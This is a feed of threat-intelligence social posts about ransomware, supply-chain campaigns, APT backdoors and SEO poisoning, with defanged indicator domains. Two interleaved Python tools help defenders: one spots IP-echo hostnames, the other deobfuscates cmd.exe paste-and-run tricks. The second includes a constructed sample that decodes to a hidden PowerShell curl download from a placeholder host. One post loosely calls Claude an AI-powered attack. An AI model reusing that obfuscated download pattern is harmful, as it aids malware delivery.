  • darkwebsonar@infosec.exchange
    Qilin claims ransomware attack on United States' Transgas Inc. Exfiltration of data reported. #Ransomware #Transportation #USA #ThreatIntel
  • adulau@infosec.exchange
    I'm happy to announce the long-awaited first release of misp-modules-cli version 1.0.0. This initial release makes it nifty and convenient to use MISP expansion modules directly from the command line, whether you are working against a local or remote misp-modules service. The goal is simple: bring the power of misp-modules into a lightweight CLI workflow that is easy to script, automate, and integrate into daily analysis work.
    #misp #mispmodules #threatintelligence #threatintel #opensource #cli #cybersecurity #osint @misp
    Release note: https://github.com/MISP/misp-modules-cli/releases/tag/v1.0
    misp-modules-cli: https://github.com/MISP/misp-modules-cli
    misp-modules: https://github.com/MISP/misp-modules
  • orlysec@swecyb.com
    (socket.dev) TeamPCP and Vect Ransomware Group Unite to Weaponize Open Source Supply Chain Compromises
    TeamPCP partners with Vect RaaS to weaponize open-source supply chain compromises for ransomware ops. Targets include Trivy, LiteLLM, GitHub Actions, npm/PyPI packages, and Docker images. 300GB+ of CI/CD credentials exfiltrated, with LiteLLM breach yielding hundreds of thousands of tokens. Vect offers 80-88% affiliate revenue via BreachForums (300K+ users). Attack chain exploits trusted pipeline components for initial access and ransomware deployment.
    Source: https://socket.dev/blog/teampcp-partners-with-vect-targeting-oss-supply-chains
    #Cybersecurity #ThreatIntel
  • orlysec@swecyb.com
    (safebreach.com) Iranian Cyber Operations: Escalating Threat Landscape, Expanded Targeting, and Evolving TTPs
    Iranian cyber ops surge: 700% spike in attacks vs Israel, IRGC-affiliated CyberAv3ngers exploit Unitronics PLCs/HMIs (default creds, LOTL) in OT/ICS. No Justice wiper (e2531f) deployed via T1566/T1534. Cotton Sandstorm uses ASPX webshells, fake-ransomware; Pioneer Kitten abuses cloud for lateral movement. CISA advisories AA25-239A/AA25-343A highlight expanded targeting (DIB, water, energy). Hybrid state-criminal ransomware collab observed.
    Source: https://www.safebreach.com/blog/an-update-on-the-heightened-threat-of-iranian-cyber-attacks/
    #Cybersecurity #ThreatIntel
  • infobloxthreatintel@infosec.exchange
    Seeing FQDNs like "mtmoqiuq.20.218.142.124.static.hostiran[.]name" and "sgrwnbid.172-202-98-170.cloud-xip[.]com", we first thought some ASNs could be exploited similarly to the ".ARPA abuse" we described in one of our recent blogs. Turns out we were overthinking it... This kind of "DNS abuse" is so straightforward... We're not sure it qualifies as DNS abuse...

    Here is what is going on: whatever IP address you prepend to "static.hostiran[.]name" creates a hostname which resolves to this IP... That is it! Same goes for cloud-xip[.]com!

    We've seen these kinds of hostnames a lot in SPAM emails recently, like the one we screenshot below which loads an image from a CDN as a giant hyperlink. We aren't sure why malicious SPAM actors bother to use this trick in their email links... If they control an IP, they can use it directly in URLs. They don't need a domain name!? And it isn't like this bypasses a firewall... If their IP is blocked, queries to those FQDNs will be too...

    Our best guesses are that:
    - Using hostnames rather than IPs helps them bypass SPAM email detection?
    - And / or it enables them to create "subdomains", which they seem to be doing to track something, either SPAM campaigns, or their victims.

    Technically, this could be used to create lookalike FQDNs. Those examples look like random subdomains, but literally anything can be prepended to the IP, so the only limit is your imagination! Not the most convincing lookalike by any means... but we've seen worse!

    Here is an example of how this can be abused to both load content from literally any IP and create low quality lookalikes:
    https://urlscan.io/result/019d1b3d-b94e-70f9-aae7-ecf5a02e3c89/
    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #spam #scam
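The mechanism described in the post above (any IPv4 address, dotted or dashed, prepended to an echo domain resolves to that address, with arbitrary labels in front of it) can be turned into a triage check for email links. What follows is an added example, not code from Infoblox or from the post. The two parent domains are the ones the post names; the URL list is constructed here, and the brand-token list and helper names are assumptions for illustration. It goes slightly beyond the post by also flagging echo hostnames that point at non-global address space.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Parent domains the post describes as echoing whatever IP is prepended to them.
# Assumption: an operator would extend this tuple with other IP-echo services
# seen in their own telemetry; the post itself provides only these two.
IP_ECHO_SUFFIXES = ("static.hostiran.name", "cloud-xip.com")

_DOTTED = r"(?:\d{1,3}\.){3}\d{1,3}"     # 20.218.142.124
_DASHED = r"(?:\d{1,3}-){3}\d{1,3}"      # 172-202-98-170
_EMBEDDED_IP = re.compile(rf"(?:^|\.)({_DOTTED}|{_DASHED})$")


def refang(text):
    """Turn defanged 'a[.]b' notation back into a normal hostname/URL."""
    return text.lower().replace("[.]", ".").rstrip(".")


def parse_ip_echo_host(fqdn):
    """Return (prefix, ip, suffix) when fqdn is <anything>.<ip>.<echo-suffix>.

    Returns None for ordinary hostnames and for embedded octets above 255.
    Dotted and dashed IP forms are both accepted, matching the two shapes
    quoted in the post.
    """
    host = refang(fqdn)
    for suffix in IP_ECHO_SUFFIXES:
        if not host.endswith("." + suffix):
            continue
        left = host[: -len(suffix) - 1]          # labels before the echo suffix
        m = _EMBEDDED_IP.search(left)
        if m is None:
            return None
        try:
            ip = ipaddress.IPv4Address(m.group(1).replace("-", "."))
        except ipaddress.AddressValueError:      # e.g. 999.1.1.1
            return None
        prefix = left[: m.start(1)].rstrip(".")  # attacker-chosen labels, may be empty
        return prefix, str(ip), suffix
    return None


def triage(urls, brand_tokens=("login", "paypal", "microsoft")):
    """Flag URLs whose host is an IP-echo hostname; note lookalike prefixes.

    brand_tokens is an assumed, illustrative list of strings a lookalike
    prefix might contain; tune it to the brands you protect.
    """
    hits = []
    for url in urls:
        host = urlsplit(refang(url)).hostname or ""
        parsed = parse_ip_echo_host(host)
        if parsed is None:
            continue
        prefix, ip, suffix = parsed
        hits.append({
            "url": url,
            "ip": ip,                          # address the name will resolve to
            "suffix": suffix,
            "prefix": prefix,
            "lookalike": any(t in prefix for t in brand_tokens),
            "non_global_ip": not ipaddress.IPv4Address(ip).is_global,
        })
    return hits


# Constructed sample links (not from the post's screenshot). The first two
# hostnames follow the shapes quoted in the post; 203.0.113.9 is TEST-NET-3
# documentation space, so it exercises the non-global check.
SAMPLE_URLS = [
    "http://mtmoqiuq.20.218.142.124.static.hostiran[.]name/img/track.png",
    "https://login-paypal.203-0-113-9.cloud-xip[.]com/verify",
    "https://cdn.example.com/banner.png",
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_URLS):
        print(hit)
```

Because the embedded address is the resolution target by construction, the check needs no DNS lookup; if you do resolve the name in a sandbox, a mismatch between the embedded IP and the returned A record is itself worth a note, since it would mean the echo service is not behaving as the post describes.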
  • New.
    aakl@infosec.exchange
    New. Infoblox: No Reach, No Risk: The Keitaro Abuse in Modern Cybercrime Distribution https://www.infoblox.com/blog/threat-intelligence/no-reach-no-risk-the-keitaro-abuse-in-modern-cybercrime-distribution/ @InfobloxThreatIntel #infosec #threatintel #threatintelligence #scam
  • aakl@infosec.exchange
    Cyble: The Energy Sector’s Ransomware Nightmare: Why Critical Infrastructure Can’t Catch a Break https://cyble.com/blog/energy-sector-ransomware-attack-report/ #infosec #ransomware #threatintel #threatintelligence
  • orlysec@swecyb.com
    (infoblox.com) Keitaro Abuse Exposed: How Threat Actors Weaponize Commercial Adtech Across a Broad Spectrum of Cybercrime
    Keitaro TDS abuse drives surge in malvertising, cryptocurrency theft, and phishing. 20%+ of tracked threat actors (TilapiaParabens, HircusPircus, TheNovosti) exploit Keitaro for malware delivery (DonutLoader → StealC v2, RustyStealer), wallet drainers (96% of spam campaigns), and phishing. Bulletproof hosting AS214351 (FEMO IT) fronts C2s; JA4+ fingerprinting exposes admin consoles. RDGA, Sitting Ducks hijacking, and obfuscated JS enable evasion. Targets: Canadian banks, Brazilian PII, NFT scams.
    Source: https://www.infoblox.com/blog/threat-intelligence/no-reach-no-risk-the-keitaro-abuse-in-modern-cybercrime-distribution/
    #Cybersecurity #ThreatIntel
  • orlysec@swecyb.com
    (redcanary.com) Scarlet Goldfinch Threat Actor Evolves Paste-and-Run Techniques Across Multiple Attack Epochs
    Scarlet Goldfinch (SmartApeSG/ZPHP) evolves paste-and-run TTPs across 7 epochs, leveraging T1204.004 (Malicious Copy-Paste) for initial access. Recent campaigns use cmd.exe /v:on for delayed env var expansion, ^ escape obfuscation, and substring indexing. End-stage payloads remain NetSupport Manager (via Remcos), with StealC/ArechClient2 observed. DLL sideloading chain: curl-delivered HTA → AppData\Local staging → tar extraction → legitimate EXE abuse. Defenders: signature-based detection alone insufficient.
    Source: https://redcanary.com/blog/threat-intelligence/scarlet-goldfinch-clickfix/
    #Cybersecurity #ThreatIntel
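The three cmd.exe tricks named in the summary above (delayed expansion under /v:on, caret escaping, and substring indexing with `!var:~start,len!`) can be unwound statically once you emulate just those parsing rules, which is usually quicker than detonating the paste. The following is an added example, not Red Canary's code and not a Scarlet Goldfinch sample: it implements those three cmd.exe behaviours and runs them over a script constructed here for illustration, so the final command line can be read in the clear.

```python
import re

# Matches `set name=value` and `set "name=value"` (the quoted form is the usual
# way to keep trailing spaces and special characters inside the value).
_SET_RE = re.compile(r'^\s*set\s+"?(?P<name>[^=\s"]+)=(?P<value>.*?)"?\s*$',
                     re.IGNORECASE)
# Delayed-expansion substring: !name:~start! or !name:~start,len!
_SUB_RE = re.compile(r'!(?P<name>[^!:]+):~(?P<start>-?\d+)(?:,(?P<len>-?\d+))?!')
# Plain delayed-expansion reference: !name!
_VAR_RE = re.compile(r'!(?P<name>[^!:]+)!')


def strip_carets(line):
    """Remove cmd.exe caret escapes outside double quotes (c^m^d -> cmd).

    Inside double quotes a caret is literal, which obfuscators lean on as
    well, so the quote state is tracked while scanning.
    """
    out, in_quotes, i = [], False, 0
    while i < len(line):
        ch = line[i]
        if ch == '"':
            in_quotes = not in_quotes
            out.append(ch)
        elif ch == "^" and not in_quotes and i + 1 < len(line):
            out.append(line[i + 1])   # keep the escaped character, drop the caret
            i += 1
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def substring(value, start, length=None):
    """cmd.exe %v:~start,len% semantics, including negative start and length."""
    n = len(value)
    begin = start if start >= 0 else max(n + start, 0)
    if length is None:
        return value[begin:]
    if length < 0:                       # negative len: stop that many chars before the end
        return value[begin:max(n + length, 0)]
    return value[begin:begin + length]


def expand(text, env):
    """Resolve !v:~a,b! and !v! against env, as /v:on does when the line runs."""
    def _sub(m):
        raw_len = m.group("len")
        return substring(env.get(m.group("name").lower(), ""),
                         int(m.group("start")),
                         None if raw_len is None else int(raw_len))
    text = _SUB_RE.sub(_sub, text)
    return _VAR_RE.sub(lambda m: env.get(m.group("name").lower(), ""), text)


def deobfuscate(script):
    """Walk a script line by line; return (final env, expanded non-set commands)."""
    env, commands = {}, []
    for raw in script.splitlines():
        line = strip_carets(raw)
        m = _SET_RE.match(line)
        if m:
            env[m.group("name").lower()] = expand(m.group("value"), env)
        elif line.strip():
            commands.append(expand(line, env))
    return env, commands


# Constructed sample, not a real Scarlet Goldfinch script: a decoy string,
# two substrings carved out of it (one with a negative length), and a
# caret-broken command line that stitches them back together.
SAMPLE = r'''
set "s=xyz powershell abc curl def"
set "p=!s:~4,10!"
set "c=!s:~19,-4!"
!p! -w h^idden -c "!c! http://example.invalid/x"
'''

if __name__ == "__main__":
    env, cmds = deobfuscate(SAMPLE)
    for cmd in cmds:
        print(cmd)   # powershell -w hidden -c "curl http://example.invalid/x"
```

Real paste-and-run one-liners usually chain everything with `&&` on a single line rather than on separate lines; splitting on unquoted `&` before feeding each piece to `deobfuscate` is the one extension this emulator needs for that shape.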
  • technadu@infosec.exchange
    GlassWorm update:
    • Solana dead drop C2 + DHT fallback
    • Fake Chrome extension → full browser exfil
    • HW wallet phishing (Ledger/Trezor)
    • HVNC + SOCKS modules
    • Targets npm, PyPI, MCP
    Decentralized infra = stealth persistence.
    Source: https://thehackernews.com/2026/03/glassworm-malware-uses-solana-dead.html
    Follow @technadu #InfoSec #ThreatIntel #Malware
  • orlysec@swecyb.com
    (rapid7.com) Red Menshen: China-Nexus Threat Actor Deploys Evolved BPFdoor Implants as Telecom Backbone Sleeper Cells
    Red Menshen (China-nexus APT) deploys evolved BPFdoor Linux backdoor in global telecoms, targeting 4G/5G core signaling via SCTP. New variants use HTTPS-embedded 'magic ruler' triggers (9999 marker) and ICMP C2 (0xFFFFFFFF sentinel) for stealth lateral movement. RC4-MD5 encryption, process masquerading (hpasmlited, Docker), and kernel-level eBPF abuse enable persistent access. Initial access via Ivanti/Cisco/Fortinet/VMware/Palo Alto exploits. Enables IMSI harvesting and subscriber tracking.
    Source: https://www.rapid7.com/blog/post/tr-bpfdoor-telecom-networks-sleeper-cells-threat-research-report
    #Cybersecurity #ThreatIntel
  • Signal > noise
    technadu@infosec.exchange
    Signal > noise.
    GreyNoise: 242K new IPs, 99.7% no TCP handshake.
    Real activity?
    UCLOUD +472%, multi-protocol scans.
    Are you validating sources?
    Source: https://www.greynoise.io/blog/ghost-fleet-half-new-scanning-ips-geolocated-to-hong-kong
    Comment + follow TechNadu
    #Infosec #ThreatIntel #SOC
  • cr0w@infosec.exchange
    @FritzAdalis But in fairness, I aggregate them for the block lists. This is just because I was curious how many were in those prefixes total.
  • ⚡ THREAT INTELLIGENCE
    matchbook3469@infosec.exchange
    THREAT INTELLIGENCE
    FCC Bans New Foreign-Made Routers Over Supply Chain and Cyber Risk Concerns
    Vulnerability | MEDIUM
    The Federal Communications Commission has updated its Covered List to include all consumer routers made in foreign countries, banning the sale of new...
    Full analysis: https://www.yazoul.net/news/news/fcc-bans-new-foreign-made-routers-over-supply-chain-and-cyber-risk-concerns
    #ThreatIntel #Malware #ThreatHunting
  • steelefortress@infosec.exchange
    As the infosec community continues to grapple with the implications of AI-powered attacks like Claude, it's clear that our reliance on human ingenuity alone is no longer sufficient.
    Read more: https://steelefortress.com/55nexy
    #Security #Privacy #ThreatIntel
  • richardoc@infosec.exchange
    https://github.com/frenchfounder / hypercommit[.]com looks suspiciously like a supply chain attacker, trying to get around the fact that workflows are only disabled for first time contributors [1]
    Either this, or they're just spamming hundreds and hundreds of repos.
    They've no prior contributing history to anything, and all their profiles/etc are blank. One to watch out for given all the attacks against #github #repos at the moment
    #threatIntel #threatIntelligence #OSInt #hyperCommit
    [1] https://github.blog/changelog/2021-04-22-github-actions-maintainers-must-approve-first-time-contributor-workflow-runs/
  • jmeyer@infosec.exchange
    RE: https://infosec.exchange/@deepfield/116284754769568339
    The operator built triple-layer crypto, fast-flux DNS across 30+ ASes, biweekly C2 rotation — then shipped an unstripped debug build on port 8090, a couple of ports over from production. 300+ symbols, project name, internal module names, all right there in readelf.
    Anyway here's the full writeup.
    https://github.com/deepfield/public-research/blob/main/jackskid/report.md
    #threatintel #ddos
  • Most Mirai forks are disposable.
    deepfield@infosec.exchange
    Most Mirai forks are disposable. #Jackskid was built not to be.
    Joint research with Comcast Threat Research Labs — we tracked this botnet across 80+ samples and 13 build generations as it evolved from a bare-bones prototype into a dual-vector Android TV/IoT platform with triple-layer encryption and DNS-over-HTTPS C2.
    Report and IoCs: https://github.com/deepfield/public-research/blob/main/jackskid/report.md
    #threatintel #ddos
  • infobloxthreatintel@infosec.exchange
    Dios mio! While researching a particular type of Colombian folk music, we stumbled across a .edu domain selling... accordions? Our first thought was potentially domain hijacking, but it appears to be more likely an exploitation of CVE-2026-27210 (TLDR; cross-site scripting). While the vulnerability has been patched in the plugin itself, not all pages have updated their plugins, and search engines have already indexed the poisoned pages! Pivoting led to 50+ additional domains found spread across three risky TLDs: .sbs, .pics, and .shop. The domains on .sbs and .pics appear to be config servers to exploit the vulnerability; the domains on .shop are the landing pages where victims can be scammed.
    IOCs:
    000o[.]sbs,0pen[.]sbs,123buys[.]shop,123me[.]shop,1bg[.]pics,1ki[.]pics,1mage[.]sbs,1ql[.]pics,1ty[.]pics,1vi[.]pics,1wr[.]pics,2ty[.]pics,569oagri[.]shop,66buys[.]shop,6ip[.]pics,6ym[.]pics,7rt[.]pics,8pi[.]pics,99buys[.]shop,99i[.]pics,9gwe[.]shop,a25n[.]shop,bk2[.]pics,bk59t[.]shop,buysok[.]shop,c68k[.]shop,cc1[.]pics,doo[.]pics,ep7[.]pics,estore-1[.]com,g9gvv[.]sbs,gaer896[.]shop,gm5[.]pics,gosok[.]shop,gt3[.]pics,h66p[.]shop,hh6[.]pics,iilvw[.]sbs,im9[.]pics,img1[.]sbs,in6[.]pics,jj3[.]pics,kk9[.]pics,lilil[.]sbs,llvvw[.]sbs,m66p6[.]shop,mebuys[.]shop,mg6[.]pics,mh8f6k[.]shop,mkk[.]pics,ms1[.]pics,nn6[.]pics,onsgs[.]com,p6[.]pics,p888p[.]shop,pan1[.]top,pic1[.]sbs,pic2[.]sbs,pt11[.]sbs,py3y[.]com,qq1[.]pics,rey89p[.]shop,shop56[.]shop,t88t8[.]shop,tp1[.]pics,tp9[.]pics,trues[.]sbs,up9[.]pics,upimg[.]sbs,uu2[.]pics,vt5[.]pics,vteyu[.]shop,vvf1[.]sbs,vvp1[.]sbs,w2w[.]pics,w88p[.]shop,wp59q[.]shop,wvlll[.]sbs,wvv1[.]sbs,wvvvv[.]sbs,x2p[.]pics,xyaer548[.]shop,yi1[.]pics
    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #seo_poisoning #seopoisoning
  • 0x58@infosec.exchange
    Writing this from San Diego — about as far from my Swiss desk as a timezone can stretch. But the news didn't care about my travel schedule.
    If there's one thread running through this week, it's Iran: Boggy Serpens refining its AI-enhanced espionage playbook, an attempted intrusion at Poland's nuclear research center with Iranian fingerprints, the EU hitting Iranian entities with fresh sanctions — and Iran's own population cut off from the internet for over two weeks now. Stryker is still cleaning up from last week's Handala attack too. A lot of activity from a lot of pro-Iran actors in one week.
    → Week #12/2026 also covers: 🪱 GlassWorm escalates its supply chain campaign, EU votes to ban mass message scanning, a witness blamed ChatGPT for his smartglasses
    Full issue: https://infosec-mashup.santolaria.net/p/infosec-mashup-12-2026-iran-is-everywhere-this-week
    If you find it useful, subscribe to get it in your inbox every weekend
    #infosecMASHUP #cybersecurity #infosec #threatintel